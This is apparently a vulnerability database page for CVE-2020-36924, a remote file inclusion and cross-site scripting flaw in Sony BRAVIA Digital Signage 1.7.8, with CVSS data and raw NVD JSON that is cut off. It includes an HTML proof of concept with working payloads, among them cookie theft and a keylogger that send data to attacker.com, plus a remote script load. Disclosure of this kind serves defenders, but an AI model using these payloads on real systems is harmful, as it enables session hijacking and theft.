Security Vulnerability Report
中文
CVE-2020-36924 CVSS 6.1 MEDIUM

CVE-2020-36924

Published: 2026-01-06 16:15:49
Last Modified: 2026-01-26 16:15:54

Description

Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:* - VULNERABLE
Sony BRAVIA Digital Signage 1.7.8及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2020-36924 PoC - Sony BRAVIA Digital Signage XSS/RFI --> <!-- This PoC demonstrates the content material URL parameter injection --> <!DOCTYPE html> <html> <head> <title>CVE-2020-36924 PoC</title> </head> <body> <h2>CVE-2020-36924 - Sony BRAVIA Digital Signage</h2> <h3>Remote File Inclusion / XSS via material URL Parameter</h3> <p>Attack Vector: Inject malicious script via material URL parameter</p> <!-- PoC 1: Basic XSS via material parameter --> <h4>PoC 1: Reflected XSS</h4> <a href="http://target-bravia/signage?material=<script>alert('XSS')</script>"> Click to Test XSS </a> <!-- PoC 2: Session Hijacking --> <h4>PoC 2: Session Hijacking</h4> <a href="http://target-bravia/signage?material=<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>"> Click to Steal Session </a> <!-- PoC 3: Remote File Inclusion --> <h4>PoC 3: Remote JavaScript Inclusion</h4> <a href="http://target-bravia/signage?material=http://attacker.com/malicious.js"> Click to Load Remote Script </a> <!-- PoC 4: Content Modification --> <h4>PoC 4: Display Content Manipulation</h4> <a href="http://target-bravia/signage?material=<img src=x onerror='document.getElementById("display").innerHTML="<h1>HACKED</h1>"'>"> Click to Modify Display </a> <script> // Simulated attack payload construction function constructPayload(payloadType) { const baseUrl = 'http://target-bravia/signage'; const payloads = { xss: '<script>alert("CVE-2020-36924")</script>', cookie theft: '<script>fetch("http://attacker.com/log?c="+btoa(document.cookie))</script>', keylogger: '<script>document.onkeypress=function(e){fetch("http://attacker.com/k?"+e.key)}</script>', defacement: '<script>document.body.innerHTML="<h1>COMPROMISED</h1>"</script>' }; return baseUrl + '?material=' + encodeURIComponent(payloads[payloadType]); } console.log('CVE-2020-36924 PoC Generator'); console.log('Use these payloads with the material parameter'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36924", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.947", "lastModified": "2026-01-26T16:15:54.497", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type."}, {"lang": "es", "value": "Sony BRAVIA Digital Signage 1.7.8 contiene una vulnerabilidad de inclusión remota de ficheros que permite a los atacantes inyectar scripts arbitrarios del lado del cliente a través del parámetro URL de material de contenido. Los atacantes pueden explotar esta vulnerabilidad para secuestrar sesiones de usuario, ejecutar código de cross-site scripting y modificar el contenido de la pantalla manipulando el tipo de material de entrada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.8", "matchCriteriaId": "52C80402-E933-4ADC-BB1A-B82CD69D64BF"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020120030", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192605", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstorm.news/files/id/160345", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://pro-bravia.sony.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro-bravia.sony.net/resources/software/bravia-signage/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro.sony/ue_US/products/display-software", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49186", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/sony-bravia-digital-signage-unauthenticated-remote-file-in ... (truncated)